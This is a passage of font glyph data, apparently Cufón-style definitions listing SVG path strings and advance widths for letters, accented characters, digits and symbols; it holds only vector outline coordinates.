-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm172,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":312},{"d":"85,-133v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21","w":119},{"d":"111,-271r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-191r25,0r0,34v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"45,-184r-18,0r-4,-81r26,0","w":71},{"d":"145,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0xm20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"d":"49,-262r25,0r0,71r39,0r0,21r-39,0r0,170r-25,0r0,-170r-34,0r0,-21r34,0r0,-71","w":121},{"d":"18,-97v0,-94,127,-132,174,-61r0,-33r25,0r0,152v24,131,-159,148,-197,54r27,0v31,61,167,48,145,-51v-46,66,-174,33,-174,-61xm193,-97v0,-45,-29,-75,-73,-75v-45,0,-76,32,-78,76v-2,42,33,73,76,73v44,0,75,-30,75,-74","w":242},{"d":"175,-202v-2,32,-19,42,-45,65r66,68v19,-16,19,-16,31,-27r18,19v-11,10,-22,19,-31,26r49,51r-36,0r-33,-35v-37,27,-49,42,-96,42v-37,0,-67,-25,-67,-60v0,-45,26,-56,63,-88v-20,-27,-34,-32,-34,-61v0,-64,118,-61,115,0xm117,-224v-21,0,-38,16,-28,35v6,10,15,21,25,33v18,-14,30,-26,35,-46v0,-14,-15,-22,-32,-22xm57,-55v1,29,39,47,70,32v14,-6,30,-17,49,-30r-65,-69v-31,26,-47,34,-54,67","w":272},{"d":"24,-265r24,0r0,265r-24,0r0,-265","w":72},{"d":"16,-250v0,-11,9,-20,20,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-11,0,-20,-10,-20,-21xm24,-191r25,0r0,191r-25,0r0,-191","w":72},{"d":"10,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm82,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":132},{"d":"29,-323r24,0r51,45r-31,0r-31,-27r-33,27r-32,0xm28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm129,-281r38,0r-52,54r-24,0","w":233},{"d":"198,-180r0,101r-24,0r0,-77r-154,0r0,-24r178,0","w":218},{"d":"18,-96v0,-69,73,-125,141,-89v-11,-15,-24,-28,-38,-41r-38,16r-9,-19r31,-13v-11,-9,-21,-17,-29,-23r34,0v6,4,12,9,18,14r29,-12r9,18r-20,9v40,38,72,77,72,136v0,62,-41,103,-101,105v-54,2,-99,-47,-99,-101xm192,-96v0,-46,-28,-77,-72,-77v-41,0,-77,32,-77,76v0,42,34,79,75,78v43,-2,75,-31,74,-77","w":235},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"73,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":116},{"d":"18,-61r148,-68r-148,-69r0,-25r182,82r0,23r-182,83r0,-26","w":218},{"d":"159,-259r29,0r-73,130r63,0r0,20r-66,0r0,27r66,0r0,21r-66,0r0,61r-25,0r0,-61r-65,0r0,-21r65,0r0,-27r-65,0r0,-20r62,0r-73,-130r29,0r59,106"},{"d":"67,-259r50,0r0,259r-25,0r0,-233r-41,0"},{"d":"113,-172v-73,0,-61,94,-61,172r-25,0r0,-191r25,0r0,33v15,-22,34,-38,65,-38v35,1,51,18,61,46v13,-26,36,-45,70,-46v85,-1,62,111,65,196r-25,0v-7,-66,25,-173,-45,-172v-74,1,-60,94,-61,172r-24,0v-6,-66,23,-172,-45,-172","w":337},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm96,-333r39,54r-25,0r-51,-54r37,0","w":193},{"d":"273,-138r0,93r19,0r0,17r-19,0r0,30r-19,0r0,-30r-76,0xm254,-45r0,-44r-38,44r38,0xm68,7r162,-272r20,0r-162,272r-20,0xm33,-262r33,0r0,133r-19,0r0,-116r-26,0","w":299},{"d":"85,-260v0,-20,18,-37,38,-37v20,0,37,17,37,37v0,20,-17,38,-37,38v-20,0,-39,-17,-38,-38xm142,-260v0,-9,-9,-20,-19,-19v-10,-1,-20,9,-20,19v0,10,10,19,20,19v9,0,19,-10,19,-19xm118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm145,-333r39,54r-25,0r-51,-54r37,0","w":312},{"d":"129,5v-35,-2,-59,-16,-77,-38r0,103r-24,0r0,-335r24,0r0,109v17,-23,40,-39,76,-40v54,-1,99,47,99,100v0,53,-45,102,-98,101xm202,-95v0,-45,-31,-76,-76,-77v-41,-1,-76,35,-76,77v0,46,33,77,77,77v43,0,75,-34,75,-77","w":245},{"d":"-2,-304r184,0r0,19r-184,0r0,-19","w":180},{"d":"50,-7v0,-44,-2,-64,-37,-68r0,-29v40,-4,37,-33,37,-81v0,-56,12,-76,65,-74r0,28v-29,0,-37,5,-36,36v0,63,1,86,-36,105v29,14,36,33,36,80v0,48,-7,62,36,62r0,27v-59,2,-65,-24,-65,-86","w":126},{"d":"39,-262r33,0r0,133r-19,0r0,-116r-26,0","w":119},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138xm161,41v-2,-9,-13,-8,-23,-5r5,-36r15,0r-3,21v14,-4,26,6,27,18v-1,28,-43,34,-70,23r4,-13v15,5,44,9,45,-8","w":292},{"d":"69,-191r-39,96r39,95r-26,0r-39,-95r39,-96r26,0xm149,-191r-39,96r39,95r-26,0r-39,-95r39,-96r26,0","w":152},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84xm108,-281r38,0r-52,54r-24,0","w":193},{"d":"31,-259r130,0r0,26r-104,0r0,81r104,0r0,25r-104,0r0,127r-26,0r0,-259","w":174},{"d":"81,-212r35,0r0,35r-35,0r0,-35xm10,-141r178,0r0,24r-178,0r0,-24xm81,-82r35,0r0,36r-35,0r0,-36","w":197},{"d":"18,-259r30,0r62,101r62,-101r30,0r-77,126r82,133r-30,0r-67,-108r-68,108r-30,0r83,-133","w":219},{"d":"107,-240v-31,0,-52,19,-52,52r-25,0v-1,-47,31,-77,77,-77v62,0,97,63,52,102v-19,16,-88,25,-87,56v0,16,18,26,36,26v26,0,35,-13,38,-37r26,0v-2,38,-25,62,-64,62v-34,0,-62,-20,-62,-51v0,-65,106,-45,109,-97v1,-22,-23,-36,-48,-36xm85,-17v0,-12,10,-22,22,-22v11,0,21,10,21,22v0,12,-9,22,-21,22v-12,0,-23,-9,-22,-22","w":212},{"d":"97,-141r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0","w":218},{"d":"92,-224v-5,-35,-66,-30,-65,7r-18,0v0,-28,24,-48,53,-48v34,0,61,31,43,61v-10,17,-41,42,-58,58r66,0r0,17r-112,0r63,-57v17,-17,24,-19,28,-38","w":119},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196","w":218},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm52,-333r38,0r-52,54r-24,0","w":81},{"d":"99,-184r-18,0r-4,-81r26,0xm31,-184r-19,0r-4,-81r26,0","w":111},{"d":"69,-302v33,-42,79,15,116,-12r13,17v-35,39,-87,-20,-118,13xm137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"266,-126v0,81,-46,126,-136,126r-93,0r0,-117r-31,0r0,-24r31,0r0,-118r65,0v110,-3,164,38,164,133xm240,-126v0,-93,-69,-114,-178,-107r0,92r68,0r0,24r-68,0r0,93v106,5,178,-8,178,-102","w":284},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm98,-281r39,54r-25,0r-51,-54r37,0","w":218},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"121,-323r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77xm107,-281r39,54r-25,0r-51,-54r37,0","w":235},{"d":"53,-250v34,-42,79,15,117,-12r12,17v-34,39,-86,-20,-117,13xm18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"38,-133v-6,114,153,162,216,80r18,0v-29,37,-54,58,-108,58v-82,0,-140,-55,-140,-137v0,-81,56,-137,138,-139v65,-2,126,52,126,113v0,59,-39,99,-90,104v-13,1,-22,-4,-21,-19v-31,38,-101,8,-97,-46v3,-42,30,-85,75,-83v24,1,35,9,46,26r5,-24r19,0r-22,122v0,5,3,10,9,9v34,-6,62,-42,62,-85v0,-58,-53,-102,-113,-101v-74,1,-119,50,-123,122xm157,-183v-56,-3,-75,107,-10,108v50,1,68,-107,10,-108","w":312},{"d":"92,-302v33,-42,79,15,116,-12r13,17v-34,39,-87,-19,-117,13xm20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"d":"106,-323r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266","w":235},{"d":"157,-85v0,-59,-64,-73,-116,-45r24,-129r112,0r0,25r-92,0r-13,71v61,-20,112,20,112,79v0,102,-158,126,-169,21r26,0v5,28,23,44,54,45v35,1,62,-31,62,-67"},{"d":"57,-281r39,54r-25,0r-51,-54r37,0","w":136},{"d":"75,70r-59,0r0,-25r35,0r0,-286r-35,0r0,-24r59,0r0,335","w":126},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm62,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm134,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":235},{"d":"95,-323r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259","w":193},{"d":"154,-128v21,-1,21,-7,44,-19r0,28v-20,10,-25,15,-44,17v-22,3,-66,-28,-88,-28v-21,0,-26,7,-46,19r0,-29v20,-10,25,-14,44,-16v22,-2,65,29,90,28","w":218},{"d":"87,-160r0,-77r24,0r0,77r77,0r0,24r-77,0r0,76r-24,0r0,-76r-77,0r0,-24r77,0xm188,-28r0,24r-178,0r0,-24r178,0","w":197},{"d":"118,-196v36,1,59,17,76,40r0,-109r24,0r0,265r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm196,-95v0,-42,-35,-78,-76,-77v-45,1,-76,32,-76,77v0,44,32,77,76,77v44,0,76,-31,76,-77","w":246},{"d":"68,-265v49,9,106,12,154,-5r21,0r-189,288r-23,0r171,-262v-22,6,-52,7,-83,7v29,39,-4,94,-51,94v-33,0,-62,-28,-60,-61v1,-35,25,-60,60,-61xm108,-204v0,-20,-19,-39,-39,-39v-20,0,-39,19,-39,39v0,20,18,38,39,38v21,0,39,-18,39,-38xm149,-53v0,-33,28,-61,61,-61v33,0,61,28,61,61v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61xm249,-53v1,-20,-18,-39,-39,-39v-21,0,-38,18,-38,39v0,20,18,38,38,38v21,0,39,-18,39,-38","w":278},{"d":"21,-129v-1,-102,103,-162,203,-124v19,8,39,21,57,38r-20,19v-24,-24,-58,-43,-98,-43v-64,0,-111,45,-115,109v-8,122,200,156,219,31r-82,0r0,-25r111,0v1,80,-52,129,-130,131v-80,2,-144,-58,-145,-136","w":313},{"d":"51,-265r59,0r0,25r-34,0r0,286r34,0r0,24r-59,0r0,-335","w":126},{"d":"121,7v-63,0,-89,-33,-89,-109r0,-157r26,0r0,157v-5,59,16,84,61,84v93,0,49,-150,59,-241r26,0v-5,112,31,266,-83,266xm107,-333r39,54r-25,0r-51,-54r37,0","w":235},{"d":"98,-265v82,-2,89,94,49,155r-78,117r-21,-14r70,-106v-53,20,-101,-21,-100,-72v0,-49,34,-79,80,-80xm43,-185v0,28,26,54,54,54v29,0,55,-25,55,-54v0,-29,-26,-55,-55,-55v-29,0,-54,26,-54,55"},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"249,-126v0,81,-45,128,-135,126r-83,0r0,-259r54,0v111,-3,164,38,164,133xm223,-126v0,-89,-61,-113,-167,-107r0,209v104,5,167,-13,167,-102","w":267},{"d":"272,-138r0,93r18,0r0,17r-18,0r0,30r-20,0r0,-30r-76,0xm252,-45r0,-44r-37,44r37,0xm76,7r162,-272r20,0r-163,272r-19,0xm64,-248v-15,1,-22,8,-28,21r-19,0v3,-48,90,-50,93,-2v0,10,-5,18,-16,25v44,17,21,78,-29,78v-32,0,-48,-15,-53,-42r19,0v3,34,68,32,68,-1v0,-21,-19,-23,-44,-25r0,-17v38,7,46,-37,9,-37","w":299},{"d":"6,-233r0,-26r142,0r0,26r-58,0r0,233r-26,0r0,-233r-58,0","w":153},{"d":"7,-191r26,0r66,147r63,-147r27,0r-114,261r-26,0r36,-84","w":193},{"d":"10,-202v0,-34,25,-63,56,-63v32,0,57,30,57,63v0,33,-24,62,-57,62v-33,0,-56,-28,-56,-62xm102,-202v0,-24,-15,-43,-36,-44v-45,0,-47,88,0,88v21,-1,36,-20,36,-44","w":132},{"d":"28,-259r26,0r0,259r-26,0r0,-259xm30,-333r39,54r-25,0r-51,-54r37,0","w":81},{"d":"66,-265r0,200r-26,0r0,-200r26,0xm31,-17v0,-27,44,-28,44,0v0,12,-10,22,-22,22v-12,0,-22,-10,-22,-22","w":106},{"d":"10,-27v0,-30,35,-52,64,-33v4,-25,1,-45,-6,-66r-51,0r0,-22r45,0v-35,-70,10,-137,81,-110v18,12,29,30,31,60r-24,0v0,-25,-12,-44,-36,-44v-52,-1,-41,59,-26,94r57,0r0,22r-51,0v7,24,10,56,3,80v10,7,30,25,49,26v11,0,17,-13,18,-40r25,0v-1,33,-10,67,-40,67v-24,0,-46,-16,-61,-29v-13,39,-77,39,-78,-5xm34,-30v4,21,28,14,34,-6v-14,-11,-32,-12,-34,6"},{"d":"20,0r36,-259r5,0r105,213r104,-213r4,0r37,259r-25,0r-26,-185r-91,185r-7,0r-92,-186r-25,186r-25,0","w":330},{"d":"29,-41v36,34,87,33,87,-44r0,-174r26,0r0,175v15,96,-75,110,-127,63","w":173},{"d":"31,-259r27,0r0,97r103,-97r35,0r-124,116r134,143r-35,0r-113,-121r0,121r-27,0r0,-259","w":212},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm145,-333r38,0r-52,54r-24,0","w":266},{"d":"79,-281r38,0r-52,54r-24,0","w":135},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124xm118,-333r38,0r-52,54r-24,0","w":213},{"d":"28,-259r26,0r0,259r-26,0r0,-259","w":81},{"d":"175,-197v0,29,-16,43,-37,55v28,15,48,31,49,68v0,48,-37,81,-88,81v-51,0,-87,-35,-87,-79v0,-36,21,-55,50,-70v-22,-11,-38,-29,-38,-56v0,-39,34,-67,77,-67v42,0,74,28,74,68xm149,-198v0,-23,-20,-42,-49,-42v-26,0,-49,18,-49,43v-1,23,26,46,50,45v26,-2,48,-19,48,-46xm161,-74v0,-29,-29,-55,-60,-55v-34,0,-64,27,-63,58v1,33,27,53,62,53v35,1,61,-24,61,-56"},{"d":"29,-197v0,-37,27,-58,64,-62r0,-18r23,0r0,19v26,6,39,15,53,36r-19,15v-9,-14,-20,-22,-34,-25r0,87v48,28,72,32,72,82v0,41,-28,65,-72,69r0,55r-23,0r0,-55v-41,-3,-63,-19,-80,-46r18,-14v16,22,37,34,62,36r0,-109v-40,-20,-64,-24,-64,-70xm93,-234v-31,0,-49,33,-31,58v6,9,17,16,31,22r0,-80xm116,-19v36,-2,62,-41,37,-71v-7,-9,-19,-17,-37,-27r0,98"},{"d":"195,-190v0,50,-35,70,-90,70r93,120r-32,0r-93,-120r-14,0r0,120r-26,0r0,-259v84,-2,162,-5,162,69xm168,-190v0,-49,-56,-44,-109,-43r0,88v53,1,109,5,109,-45","w":218},{"d":"57,-270v41,93,37,257,-7,345r-28,0v45,-87,51,-252,8,-345r27,0","w":132},{"d":"61,-31v-85,-79,-26,-234,95,-234v30,0,57,9,82,26r26,-31r18,16r-26,31v22,22,34,53,36,94v4,104,-123,175,-212,113r-29,34r-19,-15xm221,-219v-72,-52,-174,0,-174,91v0,30,10,56,31,77xm97,-36v74,45,172,-7,169,-93v0,-29,-10,-54,-28,-74","w":312},{"d":"65,-265r23,0r-5,52r43,-31r11,20r-48,22r48,21r-11,20r-43,-30r5,52r-23,0r5,-52r-43,30r-12,-20r50,-21r-50,-22r12,-20r43,31","w":152},{"d":"98,7v-66,0,-87,-58,-87,-136v0,-79,19,-136,87,-136v68,0,90,59,90,136v0,77,-23,136,-90,136xm99,-240v-51,6,-63,48,-63,111v0,64,11,112,63,112v52,0,65,-55,65,-112v0,-59,-14,-107,-65,-111"},{"d":"49,7r162,-272r20,0r-163,272r-19,0xm31,-262r33,0r0,133r-19,0r0,-116r-26,0xm256,-94v-5,-35,-66,-30,-65,7r-18,0v0,-28,24,-48,53,-48v34,0,61,31,43,61v-10,17,-41,42,-58,58r66,0r0,17r-112,0r63,-57v17,-17,24,-19,28,-38","w":299},{"d":"153,-265r6,0r0,180r31,0r0,25r-31,0r0,60r-26,0r0,-60r-124,0xm133,-85r0,-108r-76,108r76,0"},{"w":100},{"d":"102,-240v-37,0,-58,25,-60,62r-25,0v0,-50,38,-86,86,-87v60,-2,101,64,69,118v-21,36,-74,87,-105,122r119,0r0,25r-175,0r99,-107v29,-34,45,-39,48,-80v2,-29,-26,-54,-56,-53"},{"d":"31,-259r26,0r0,234r100,0r0,25r-126,0r0,-259","w":166},{"d":"59,-250v33,-42,79,15,116,-12r12,17v-34,39,-86,-20,-117,13xm118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77","w":245},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm112,-281r39,54r-25,0r-51,-54r37,0","w":245},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0","w":233},{"d":"49,-22v-65,-57,-19,-174,68,-174v24,0,44,7,62,21r21,-24r16,13r-22,26v55,62,5,165,-76,165v-19,0,-37,-4,-53,-14r-20,24r-16,-13xm163,-156v-57,-46,-145,16,-114,91v4,10,9,18,16,25xm81,-28v70,41,144,-47,96,-113","w":235},{"d":"27,-265r25,0r0,151r88,-77r37,0r-105,91r111,100r-35,0r-96,-86r0,86r-25,0r0,-265","w":180},{"d":"157,-21v-19,33,-86,32,-106,1r0,90r-25,0r0,-261r25,0v3,71,-20,170,53,169v72,-1,50,-99,53,-169r25,0r0,191r-25,0r0,-21","w":207},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm77,-298v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm149,-298v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":266},{"d":"217,-106r0,19r-44,0r-13,87r-19,0r12,-87r-58,0r-13,87r-20,0r14,-87r-44,0r0,-19r47,0r9,-59r-45,0r0,-19r47,0r13,-82r18,0r-11,82r58,0r12,-82r20,0r-13,82r40,0r0,19r-42,0r-9,59r41,0xm165,-165r-58,0r-9,59r58,0","w":259},{"d":"33,-174v0,-12,9,-22,21,-22v12,0,23,9,22,22v0,12,-10,21,-22,21v-12,0,-21,-9,-21,-21xm52,-47r24,11r-36,66r-18,-7","w":99},{"d":"147,-265r-107,300r-27,0r107,-300r27,0","w":157},{"d":"84,0r39,-96r-39,-95r26,0r39,95r-39,96r-26,0xm4,0r39,-96r-39,-95r26,0r39,95r-39,96r-26,0","w":152},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"198,-180r0,24r-178,0r0,-24r178,0xm198,-103r0,24r-178,0r0,-24r178,0","w":218},{"d":"96,-312v0,-20,17,-38,37,-38v20,0,39,17,38,38v0,20,-18,37,-38,37v-20,0,-37,-17,-37,-37xm152,-313v0,-9,-10,-19,-19,-19v-9,0,-20,9,-19,19v-1,10,9,20,19,20v10,0,19,-10,19,-20xm137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0","w":266},{"d":"116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0xm106,-281r39,54r-25,0r-51,-54r37,0","w":233},{"d":"187,-74v0,44,-37,75,-84,74r-71,0r0,-259v69,-3,134,0,134,64v0,26,-14,44,-33,54v32,11,54,28,54,67xm139,-195v1,-39,-40,-40,-82,-38r0,83v47,2,80,-5,82,-45xm160,-74v0,-47,-45,-52,-103,-50r0,99v55,2,103,-1,103,-49","w":206},{"d":"135,-271v80,0,138,58,138,138v0,80,-58,138,-138,138v-80,0,-139,-58,-139,-138v0,-80,58,-138,139,-138xm135,-14v68,0,118,-49,118,-119v0,-70,-50,-119,-119,-119v-68,0,-118,51,-118,119v0,69,50,119,119,119xm62,-132v0,-68,69,-108,120,-70v13,9,19,24,20,40r-24,0v-4,-20,-18,-32,-41,-32v-33,1,-49,25,-49,62v0,68,88,82,90,17r24,0v-4,36,-29,63,-67,63v-46,0,-73,-32,-73,-80","w":268},{"d":"33,-17v0,-12,10,-22,21,-22v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-21,-10,-21,-22","w":99},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110","w":312},{"d":"32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0","w":266},{"d":"18,-146v4,-55,72,-66,106,-24r-16,16v-21,-26,-62,-26,-68,7v7,45,84,41,84,96v0,59,-86,74,-115,29r16,-18v13,14,26,22,40,22v18,0,35,-14,35,-32v-4,-47,-86,-40,-82,-96","w":139},{"d":"17,-259r26,0r53,187r74,-187r5,0r74,187r53,-187r27,0r-74,259r-5,0r-77,-196r-78,196r-5,0","w":345},{"d":"108,-121r0,-144r25,0r0,135xm108,70r0,-168r25,-10r0,178r-25,0","w":241},{"d":"12,-259r28,0r86,200r87,-200r28,0r-113,259r-5,0","w":252},{"d":"39,-191v-1,-42,-2,-81,39,-79v8,0,17,2,28,5r0,24v-23,-10,-47,-11,-42,24r0,26r40,0r0,21r-40,0r0,170r-25,0r0,-170r-25,0r0,-21r25,0","w":113},{"d":"69,-302v33,-42,79,15,116,-12r13,17v-35,39,-87,-20,-118,13xm32,0r0,-259r5,0r172,198r0,-198r26,0r0,259r-6,0r-171,-195r0,195r-26,0","w":266},{"d":"24,-191r25,0r0,191r-25,0r0,-191xm-20,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm52,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":72},{"d":"156,-38v-27,25,-86,27,-112,0r-21,20r-16,-16r21,-20v-25,-28,-25,-81,0,-109r-21,-20r16,-16r21,21v27,-24,84,-27,111,-1r21,-20r15,16r-20,20v27,25,26,83,1,109r20,20r-15,16xm100,-174v-35,0,-66,31,-66,66v0,35,31,66,66,66v35,0,66,-31,66,-66v0,-35,-31,-66,-66,-66"},{"d":"105,-271r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm116,-18v39,-2,56,-16,72,-45r21,10v-17,34,-42,57,-91,58v-58,1,-100,-47,-100,-100v0,-54,43,-101,98,-101v56,0,100,43,100,102r-172,0v-1,42,31,78,72,76xm188,-115v-6,-52,-80,-76,-120,-40v-10,9,-17,22,-22,40r142,0","w":233},{"d":"108,5v-98,0,-84,-101,-84,-196r25,0v3,75,-18,178,59,172v46,-3,58,-23,58,-83r0,-89r26,0v0,0,14,196,-84,196xm53,-246v0,-12,9,-21,21,-21v11,0,20,10,20,21v0,11,-9,20,-20,20v-11,0,-21,-9,-21,-20xm125,-246v0,-11,9,-21,20,-21v12,0,21,9,21,21v0,11,-10,20,-21,20v-11,0,-20,-9,-20,-20","w":218},{"d":"117,-196v37,1,60,17,77,40r0,-35r24,0r0,261r-24,0r0,-103v-18,23,-42,36,-77,38v-53,1,-98,-47,-98,-101v0,-53,45,-101,98,-100xm195,-95v1,-42,-35,-78,-76,-77v-45,1,-76,33,-76,77v0,42,32,77,76,77v44,0,75,-31,76,-77","w":245},{"d":"103,7v-57,0,-96,-57,-72,-113v24,-55,70,-108,101,-159r21,14r-70,106v53,-20,102,21,101,72v-1,47,-34,80,-81,80xm158,-73v0,-29,-25,-54,-54,-54v-30,0,-55,25,-55,54v0,29,26,54,55,54v28,0,54,-26,54,-54"},{"d":"60,-248v-15,1,-22,8,-28,21r-19,0v3,-48,90,-50,93,-2v0,10,-5,18,-16,25v44,17,21,78,-29,78v-32,0,-48,-15,-53,-42r19,0v3,34,68,32,68,-1v0,-21,-19,-23,-44,-25r0,-17v38,7,46,-37,9,-37","w":123},{"d":"119,-173v-76,1,-68,89,-67,173r-25,0r0,-265r25,0r0,108v17,-22,38,-38,72,-39v87,-1,69,108,70,196r-24,0v-5,-70,22,-174,-51,-173","w":219},{"d":"21,-234r0,-25r137,0r-108,234r102,0r0,25r-142,0r109,-234r-98,0","w":172},{"d":"0,0r167,-259r160,0r0